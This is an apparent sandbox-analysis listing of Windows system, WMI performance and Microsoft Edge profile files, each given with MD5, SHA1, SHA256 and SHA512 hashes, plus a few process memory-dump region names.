MD5 0071da4b69f51065584a0430a42af426
SHA1 26d9affeca9e8c3c3c419f0e0c29931d2b4dc4bd
SHA256 88246dbded17bfb5fe89487bd341737ec729c43c79993c6d5fc22b929934e82a
SHA512 1a2c90d0949b5f9470d84a8374ce3194f2b8a95b28b070ba5af835621adb204c66bee925ccc9c28b1a785373415691bb724fd6369782a8c665db239aa9b77ed3

C:\Windows\INF\vhdmp.PNF

MD5 76308a73f5362dce58d680461728fa08
SHA1 92c8279429ede0f0c36431868399cba07e4ae59b
SHA256 faa3357e0b5f7803100a5e2972a95013128a63b0ff1f6b5766cb7d120ec9b8e8
SHA512 05e9c674d48dc0dee0caa8f5a24a19a0a4504716b154cb5272b56701813d5128db0f83478f46bdc753809fc8b615a32d402eba9a1aa3139c67b5061be8ecb1da

C:\Windows\INF\disk.PNF

MD5 64eddf4646a00a7e1d79fdae51bef409
SHA1 642643955b168c13bddfb78de9b2ebbc3e1e7ae9
SHA256 b805f2206c36c256a200866c7b7e1fb7e3e5cff76d913c2a37663c8b6a2b7447
SHA512 589bb111bdd33c2f71ec8ad590322871b7e968dd499f18917a251cdf730d6ae4a14eab077b437c3030eadc85b6be19d793ec882525d5e30d1e0ad3ead64590c0

C:\Windows\INF\mshdc.PNF

MD5 eac8be5a8ef7890a4d791241dc8896c3
SHA1 0201190a553e08c88a1ac19f44bb555e59595b79
SHA256 aa3a06eaae1c34d39ebbae7d59e1ec1a9aa0a88ae99d8722cf685fd2f793a5b4
SHA512 9db831a58fb6a43e7d76640f97157bb95ff3d34cacbfb733e36dfd54341655aa44030fcfbef535403dc668c0f737ca750317f8a992c0d1e48affe38f803384d5

C:\Windows\INF\hdaudbus.PNF

MD5 f52fa849b5be7cc7b6122899400613b5
SHA1 f562c38080b4a4591ea6a466729bb9eb16fd3a1f
SHA256 72b94485eb52cb82080a4ce56f4ba55f76503809d27107ea3fd00711362a4474
SHA512 fdeb4a843e8baa97f17ecbd235c81b81f01ae6f6057fa3ae2acef42c34c9ab321e0c77d93de1227c13dc8db68cf176b0593ae85d14d6301883bcb6f889a598b8

C:\Windows\INF\pci.PNF

MD5 acd7bec19985c3cfe7551c8ef70efac2
SHA1 3630fff2173b999c2443f2e27a68f78d79be1d67
SHA256 dd2db2622e33362d3f4cf6b0ba186865ab1cd6a4e6b65de114653ad5a912aa43
SHA512 5a757362ece06148da18fd24d872113c60e23db5355c713a09b5562cfb5263c881261f2489225a8b97b769879b8f7d342816b4d8e9c627d5ecb8d4a7667d16a9

C:\Windows\INF\usbport.PNF

MD5 ac141a2c789a629c3a085b207dd95c6a
SHA1 783df62c56cf12f2f7cc6fc7f9085fbe89c722ce
SHA256 7f91514a7e5d0e490a3d331a09003e61455f902447d9771da3c96e828a2be904
SHA512 64751132d72befb19c5eb221287c6c85a0884101f3d52e9aa6813d1a2628c8da826d62fb23940d48925a53a2bd8f810340554ce4500a6cd265d1eb030dec3299

C:\Windows\INF\hdaudio.PNF

MD5 607404971d6b2f58e584328b4a7226d5
SHA1 40612e86fa273a73e9d051497dfe73ede6a7fbb8
SHA256 cab815dfa59d7a08839217cbef9d96d51a99908000fefc241e062843ef0d0cd1
SHA512 9aea1ff0f45199c493b6d7f94cdb77bd505931b9dbcc3dbe11c6ea44bb0930d4bcca1b5901d4c24fda922f01e446a5f4dce1bf860896d9f30153b98a9911cfd7

C:\Windows\INF\c_swdevice.PNF

MD5 5fbb82b38fef2bb5cb9e776456133358
SHA1 316374200f3db1e7946a1c6945cff4340abbc214
SHA256 f83183c41bbe36abdc7161ae51733997fcf010631a7d53f675706909180fd3b2
SHA512 5fd99a5b9212732813d0144b1d3f9b9634bd1f1e2eb97f4d66565427fcfb64a8f64edace62e633bf00606bc4989f4e389dccbb7092b7f76daa8cc3e6ba25a170

C:\Windows\INF\umbus.PNF

MD5 d153f33bcdd333f8c83b4b1c9047c90a
SHA1 73fd19545c70df8b83b96dd991923900952334d5
SHA256 aa4f3d59235dfddf68a2e8002a563f376cc84a901948767b4b60f005ff0b2dc9
SHA512 03dfe1d77bee9c8e1c40a038d69b4777b345da896a96f33383c126492e9906cea3fca31ab7e9488acd8c8f4c74d0706d9aca68b043cb97194fdb8420aa056e07

C:\Windows\INF\kdnic.PNF

MD5 7e0f9faa92a3f9def73617e78e23443f
SHA1 50c9d963563dcf1fe9045d0b873fd22839e0e717
SHA256 ee4e7ee8fd6e3fbba07d32b4b1eb6f1fdf9999c0da4ba0ddced33d542c7461c9
SHA512 b6a6c29c512bf1296e3727cfb4efd12e153839cc50bed3a8171cdaf59c3a7c0a5012909cf0f7f96e21c2fc4e267973c69b339fef91d38451b5fe6e8ec9275c49

C:\Windows\INF\volume.PNF

MD5 c04c572e99b89dc5877efb53192ba2c1
SHA1 f9ece4a06549f70a935f0889535508a672f1d1fb
SHA256 5d47006ac8e0c5742a7ff27ac043174bf9aae244688718f93962686cab79a052
SHA512 d8749d0c526bb4ae8b4f1064f8e40519f728a7c5d053695a5b1fe842ec25a14b3f64664c21a66c82605faa02fc5dcdaddb2c0885f5775680bd5d814df14e5849

C:\Windows\INF\spaceport.PNF

MD5 8d3d2d50841793ca8a9eef7059e9fe3d
SHA1 124bd6b25dc410255c16a08bafddb2ec185442b7
SHA256 a14d99c708ff68e6f03e2ccaa60ac806636fddb6eb6102c97b8d78e712335200
SHA512 706db0dac431a0b96389505fa52277f952c6514ca8c071cd88c247137f5e40e2db76f91ab8dae95e42561dc97c9da8c13980493aae4c5cd74eb4a5638e3f8817

C:\Windows\INF\vdrvroot.PNF

MD5 e905a549525568c9faa09a4805bb5f8d
SHA1 06ae357e7a273aa76b91fe5f97d60406308734fc
SHA256 3c5615caa6e940dcde3c701f7c612a48ab575f521d00b3d1501ea21212313cdc
SHA512 86501b8ac99b4d77116b9f6122396e1315d8e91c7114d9b0edb9f9993f832007860148ddef61bc8de850c6678027880f519d75819914711e1c464dd2eb922444

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 812520ccaa421ed1b783b28f189e954d
SHA1 37e596bcc3b31c5794b085600fd2020258ae1f29
SHA256 2023613d60284c6dc92ee3c37e835a02bb744afba3ab7f8a8e9fa8bc8ad5e682
SHA512 6a4ba0e18587d3afc41c3ffd97632a25967749f7e0e027e110c28592eee52fd33d3e43b958a1c16eaa077f6c4af011ee33151c4acc484cf0bbeec24f715e443b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 ded25efaf2feecfd4fc8324ab19f988f
SHA1 52561dafb98bd7be1009d0d4eec3829ba285d549
SHA256 2fd86ac64dcbeea124588c9bcb49a4e55649ec626e6420b2c79c9eeab54bd410
SHA512 c3de5a8dd9e2773f5c4f3285ab7ae0611ed480f350b0ea703b4082f733f4af6e65cba4a4f316ccf45123f655defb49a3d04179ebf1cf637925e7fda097b7b583

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 82885ae1050fa86cd11116eee5cbff3f
SHA1 9d548ad293c83c4d6033729e8b8e62aeb7afe18d
SHA256 90c7eaa499746d18131277e4ccbfdd16a1c7c301a2eb775be2b37ca8e3881b63
SHA512 6ab01549cbd85ee7f4aa54683259c9f8002fb609c9ed7cb4f6a87bf9a0d9c4a5a1b55a861161970c5694a0945c8b480528fafdbad5be57ff4a947f12923818e0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00007b

MD5 eef911348f13105f1501b48929ef9224
SHA1 e8f3fd90ae05a940444a80a6c84cab08245891e3
SHA256 5524773f6bb8874ae1ff858bf25ca03e86f90e3a6854448e7f85726b89271da8
SHA512 ead59bd08d3f11236caf5236ac17fc8af996ec2aa1322d547e26376f7fcc8109db2417b16267cd5f55480b6263fd70fbdabcc67f99c1b1f6385a20ca85f17814

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000078

MD5 ab7fc8ab7d76d79285b17b4d9860cbf0
SHA1 b5833d99bda07236d2ad950fe452cf595fbc3c20
SHA256 99933f6af1e17aadc2472a0d537dc4cd9ea565ca56ef5081eb00c806b351083b
SHA512 200083c436e414fe92512d317cb8434d4fb099ed4075b22e171feb4b379b9b72bbd5a926b5d8040bc0d27d54bb4df5841c509a0a95bb70becfbc5f7d7f5f2daf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 260781b95fced1b137e6b357990d9ff2
SHA1 d4368f4b48f535bae78c3395684f905a0277e5c3
SHA256 ba5735ba4126677a539afb532556c387e25dfed07380cc368603212e57d3e998
SHA512 d34e6a35a8fa03aa1dfcef0d397849ab95ad0244465c45e261951a2a94e6ac4916b9b0361186de64d16bfa794693631b62377187ec6ba1c93aa366a3c254b5a4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 f408d02261df465a35d8c1a3da725414
SHA1 a60b08b716105980f68fee2bfd64181733d0e168
SHA256 ed0e9bd02d658778ac00b2f1977fdba04ee660ebe31183253c2c84e0c56acb4f
SHA512 4aa9f598215f20f9dcc70c1be5c516251f91cd581d01834103fe82bb08e6b87caf88a2aaa63e579f1ea7262410d3d59784883d4ecaeacce61bf1aeeab7c08801

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

memory/2080-894-0x00007FF97EB00000-0x00007FF97F5C2000-memory.dmp

memory/6892-1110-0x0000000003410000-0x000000000342C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 0860093bd1053db073624579ed787ed2
SHA1 c6bc683827dc31a204dd189e70fd5eee2db5818b
SHA256 b55215256a6e3ef0bff33147b3ab45faecb278eae6b411f282b7550bc53eeeeb
SHA512 7aaa5c13b562f82649203211303716babe353a834763c060c4b4c47ce9883bb8e36400f722e27b3461e9bd1be22397fcd9d290e1d58fec09c510ca86d35979d0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig

MD5 41c1930548d8b99ff1dbb64ba7fecb3d
SHA1 d8acfeaf7c74e2b289be37687f886f50c01d4f2f
SHA256 16cee17a989167242dd7ee2755721e357dd23bcfcb61f5789cc19deafe7ca502
SHA512 a684d61324c71ac15f3a907788ab2150f61e7e2b2bf13ca08c14e9822b22336d0d45d9ff2a2a145aa7321d28d6b71408f9515131f8a1bd9f4927b105e6471b75

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 800ee2c635e26e106f21c1bcefef31d1
SHA1 aeda7f4983fd8b3f25a39aa25fcc83cdbd2dcb8c
SHA256 94cf0b0505be07e56b77662d9ff49be6a6c57ecf624882f32ea41a521bd27fa2
SHA512 3c4860258241a71b07c9a74d4a85f42939206a8baf64169b3f4877f01d4fa3fa61f37cdfda829a73d2310434beb9c04b4a2124c54d8d115080ad9a331eef0aab

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 feb5c19c37e690203ccb366ac9c155ec
SHA1 5fee1e5152680e85e082b16c8f50e3742658d6a1
SHA256 c88d2fdcb1243666816a3c58ed3f47966f6b5534b527ecc93d6c0a021d1af604
SHA512 65d63348c26cc9b9496b7f4a5e2deeedea2f98075a6f556fcdc8690f4f25ae04746eb93335ea132c1a52901e87d394b52d19109a0c639857591334509ee16fde

memory/5228-3245-0x00000000017B0000-0x00000000017BC000-memory.dmp

memory/5228-3445-0x0000000001640000-0x0000000001652000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 fa52bccbef8587a374ababbfaa0bfadc
SHA1 17f9a8f6f8e2f07eecc320f5fb4603b8ff299362
SHA256 88099fbca515a8062524327d357bc876f53cbf2e88e51ccf26b5568abb64ef4e
SHA512 06f63e89969158555121322359d9f0165d3f03b0b05609e45c96e0bd3ea29302d2e0f3437677cbd8fb524d7fa40e36f57d5abe70978fdf28f820909313e66ae4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_1

MD5 d0d388f3865d0523e451d6ba0be34cc4
SHA1 8571c6a52aacc2747c048e3419e5657b74612995
SHA256 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b
SHA512 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

memory/5228-4082-0x00007FF97EB00000-0x00007FF97F5C2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2dcc86ddf935a8b7d7e2a92b38e6c45c
SHA1 04bd935e2a3258a0aa31a0666a6aeef7a2220ca3
SHA256 52eaa058f2e0fe178bbf2e967ae52b3885d658bd576ae2d88b5079c6a41dbfaa
SHA512 6d878192f71ed2094623655e1e6291b015792daaf23ee942e710a05a2ff37cbf40ab19ef631e6c71a2a090734201f736e17179ecac42e2a5f5d12f2142ed9e90

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 24f361e6fecffca1f002067c0750624c
SHA1 72c4c9dfabbc199aee88b3198a9a4af240919c56
SHA256 453da72e60a9f0e467593a4f8482fb0c0081aad4d40b2da5bc740c22f25aab76
SHA512 89e3b34866732ca240613ef66d358632ed96f272f323d7f6315eea095f3082ca727b3dd112dc2e0334dbc3b26af34903a8f5028e1265619a92e1f116cfe87ece

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 37fc173d7ed6a4b0a34b278498ef1177
SHA1 148b1b304ca7deafa8208748a336e6eff157082e
SHA256 f5d8fb69d3796a7861dc881524df28fdfdfc19197f9f6d6dc886df1c91e4d0c9
SHA512 94a7655cbb5273e46ff24d55ddc1d66a3d795b12d8531c6f8b82ef3e1fbdd99b6956de7c16956e4420cc03a5ff0b1ab73e39d11990aadcbbffdbef25743821a3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7a58e763f8ce71fb39e0915b95cc2ce2
SHA1 a207aafa432413eb7bb4b1681db7876c4c0de5e5
SHA256 16402981573839750689a8090dd8f25a6d28e8879da35bd0638214555368446b
SHA512 00c9f69b0a4b8b1b0cbe752c3d8792648f9868316d89b7fa4e57f48a95a7df78736f8bcc2fa90e3055b59f6dd8d2d5932412a6b3c60fdba36761f3325750c77f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 3266cd3f831b5ddee16041fd499e20f2
SHA1 768d82daeefcc09bd16e03fdc80f842703362414
SHA256 f1b4786c49dea572c129a4cf4ce3caedf6d76ffa45788eea86df143e0b556495
SHA512 50bc089fe26563eece3018c14db2101628ac81916dbf75c606a2278e9163db7f8858957ba8b47c6f1d7c9c2c07262213bf06ffe7ebe13a705510b649df662b04

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 33fc19561ec1a1a2e3f38cc57520fbe3
SHA1 0cf5e8fa90776108e54fb69ba1851946f2080c9e
SHA256 39d76d2eec3b07a2259abf106bb896c09c7772dd361f74eb070cdbbbec892170
SHA512 bb55b7f16f6fa39672fecba2ac601ce83a54fbb8fef803c7e4b99048b88ce5f4e2b35623583f76b3fb236f08a12318ab16bcddb62d5f5e4536287a8f5829fb8e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 9d910699cd1f70ae63d94ce7d1783ed8
SHA1 5a26ee437c3d5257bc684864415de74f6c1f9693
SHA256 2a4566acd50d116d10c127cf1e4e5c0ec84be9ee15f94ed408dbbdba0369a5a7
SHA512 1dace576ebd6ffca6d042e6397bceef97028b70e23d65ee69d2cb945420ab944c5111bb0f62ec28c8e9cdcdde0da87887fd057b4ff843fe35aadbe07133fca71

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\64865635-6cdf-4010-9cbd-157163ae8149.dmp

MD5 51f5fe54d9323faf7e385b67d1e252fd
SHA1 320dbb708c7d20e59f36dd555ad1b3df651cf145
SHA256 20c05f56de25eb522584f35f5f4fce471c903b2db77c96c88d3f53735f83b6c5
SHA512 6301c136ad739be9d898044ae153cf91ba130d76b1f8d2f0fa126239a26b534022cff9ae66c2dabdbbd01ee6d20bd927cded43f6165cbf24d0863c5c3aaca3b0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\9188d9a0-58ed-456f-a9ae-9f2b81bedb49.dmp

MD5 9d262a13df1d797c8c6800adfe8f4acc
SHA1 23c0980c6ba991ec88b8b873d73f708fd6b77638
SHA256 c529016096fd6be9f8cfb76a077c4e807f39dc30902e4587082e7810a33d376f
SHA512 b6dc5e2da1bf4e2cda20c178199bfc73f548525e245c0aa51e3754df3995925edb6ae1eabbf0e8e4e9f854d474ce4395d18d340e1449220a0cbbc0b5f33faf73

C:\Windows\System32\wbem\Performance\WmiApRpl.ini

MD5 40b778225a1abcd93b6c03c410599a94
SHA1 10a9069ddb6eb032d450894c6c94f85704b1f887
SHA256 40dd2732b634f11150bbc2d0fb6ea49ede1928bef97dc028286733134ad53d6e
SHA512 f2c64e4510421d5d8a8dceb37032f0d8dfb2b58808a48b3344ac7e9823be8b3a7bb2b5cd349a6eb8ce53f7e531d42616f275ca7cede0afd6734560377856af55

C:\Windows\System32\wbem\Performance\WmiApRpl.h

MD5 b133a676d139032a27de3d9619e70091
SHA1 1248aa89938a13640252a79113930ede2f26f1fa
SHA256 ae2b6236d3eeb4822835714ae9444e5dcd21bc60f7a909f2962c43bc743c7b15
SHA512 c6b99e13d854ce7a6874497473614ee4bd81c490802783db1349ab851cd80d1dc06df8c1f6e434aba873a5bbf6125cc64104709064e19a9dc1c66dcde3f898f5

C:\Windows\System32\perfc011.dat

MD5 5afbd30597a275ad6d5e98187742c01b
SHA1 4e9a82a388532a0fcb3671047504384e040b48a1
SHA256 26ee1d72642d1d79b307581e6027a259696d5e3299d9d6685153a68b8c58b61b
SHA512 6d2514d6a12809a7db4901b586b57e03b6e5b0cc4ecd1baeb4f5188ca033773f7ca077fa8e8beadcf82724fd16d9136c0fc252a0163b71a0ff0eae3363f2c0cf

C:\Windows\System32\perfh007.dat

MD5 3bd8043ff69087c78cf81f0aa082664f
SHA1 c669871201f05f6153dfa3f6a78d4609d818568e
SHA256 d1b8be34dfdff53435bcd3f176f7aa9f17aa8f1145c42edee1ed1eec9faf02b2
SHA512 a51d2bb5641aaff1ab091a1c331b6e515bb333d2dfa9f09662d35b2315e6fbd14932102167075cd8bdacf7c8f57fe7313f7b1639090070851c2ecf7662384d6d

C:\Windows\System32\perfc007.dat

MD5 6e71c59a539ba8c2d46c4c8f478edf8c
SHA1 868558341297d83b247f8be13b375541eb58b886
SHA256 4e4e1300a939cc5d58d0c6914410d5ad8eaf876571011fa1c6f0ce27bf59822d
SHA512 1a86ab970d99430334ba14cc14d75cb902f267e9e15019afcb64400ec6e4335adae3687a5916ccfec5fd0c82c89bfeeac2aed0c6aad693f35e7326f8fb158f9e

C:\Windows\System32\perfh00A.dat

MD5 3c5c81d56ab201092448ff8a34693c11
SHA1 8039450230b36f2927c88b1ddad892968d4c6d2d
SHA256 885a1cf4c3e9e8f591c04adde5b3ce376da63f3b930d41598a7dd93d77d29984
SHA512 4f83f54eb6f5ec2ec3af33d89a94d45c619e6c3521a086015d463f13e4715b127134e8619d7f9bc3b4186a4e28ecc0f7d2cfd0f69bfec000bca686721b52ee11

C:\Windows\System32\perfc00A.dat

MD5 6c65a113c1d1dcbc5f7603db0134dcb7
SHA1 1eb93cc7aeb12860b63129a69b812b694748a816
SHA256 53d617778c1ba174c22b47fd2d84035aa28c58bdcab6c3f3224f3777d1d8e7ee
SHA512 67c438c141f7d6509db1d0bb17b312b66be8947a623580cc49fcb3000f7e402dda856ab1d422a68bbb25392d00902fef2bd31ce9cc491769205cdd7b31edf605

C:\Windows\System32\perfh009.dat

MD5 efeeda97e31eb12669293d78feaff451
SHA1 f3680730a9ed165f49be4a2b1be8477196f15afb
SHA256 a0ae9b96680526dd73b3469504eaeb3882c655e3f4557b9e120de1ddd8edb834
SHA512 452da0e9a2c17de87d5a0db150acf299310d684c50c4f16daa5f1c298267d76d990000a0bf4e5ffb2afe5769e74bfcdf351e8d68b933a432a9130cdcdd81f1b2

C:\Windows\System32\perfh011.dat

MD5 863ba91012939df532c30c5488298d51
SHA1 d80edcebaf304b4d104b28679e13b553530af264
SHA256 31e30cdffa9c446e11ea98cd909c6c7d52f046be5e472aae006d5f0b1056c15e
SHA512 20bb28d74d021ec0e17bdc351582c2f9863d048d29bc48663c85c9627bc984082a135ce2e87c0d0327e9932de74f7ab270e6be31e18c5a69e397270462c986bd

C:\Windows\System32\perfh010.dat

MD5 0b8d19c084f992a57889b8936b811117
SHA1 51d119d5e96165647d0e61edf3a27dc359d745a8
SHA256 d415c78f28d7406a775f95f05b8eabe9dabdc5d99726413741ffdeac9cdedca1
SHA512 9928d2cb10f2ea837671a708a449fd5de0dba2e956f418767de8904d6c4e19a95949809dedb2cfb3e6024bc9b2276350aab8413c0ffce5de637a1d1ebf7d2786

C:\Windows\System32\perfc010.dat

MD5 8dc506c223e52aa8d5ae3b67e4267693
SHA1 14fa11e20c00144a77ace9423b9c5c4c7f01a4a1
SHA256 be09496098f6caa3f4f947676e85712c8a878e11881c033385f6df67a5e70504
SHA512 913e8c796f44c3f295f059980c4f6f622f69ce47ddd50f0ff3fa238dd1f82c4891a2a5e6652744a07bbc4e2579d36a1245af4ca5da7c57b84ef82dfbe5b5dc3b

C:\Windows\System32\perfh00C.dat

MD5 aa5aeb4bbeb6a920eee5ec1ded28afcd
SHA1 e152f8c921398b943ce7a3d10b339c681abb804d
SHA256 56a92a49d4d27b30ce6d665ea146431a020f83a1da86fb653978f1d0b2034c91
SHA512 5ac85b0ff778ea1b435fa5d43943e09fce743dcce8e2f06a8b5936cbfff6ca6df07a296bf5df1f2313696b9c294d69538face50145b1f0646a40b3678db89228

C:\Windows\System32\perfc00C.dat

MD5 cfe82aa29b3eccbedfd99ba507fb70b5
SHA1 1046e8d16eeaeb4a517119f3b0d4c3428e25f60a
SHA256 acf6a8a25384353ce650843f5822bbf5e53dfb9485ae5454daef099088924b65
SHA512 7dbcd22e25357a400873cb80b474304a3fb67ac4fa6f6236f3cb5117d43e1c176e676c57042cfb2410f811cbdca602a56df0842610355defe7174439bb54877b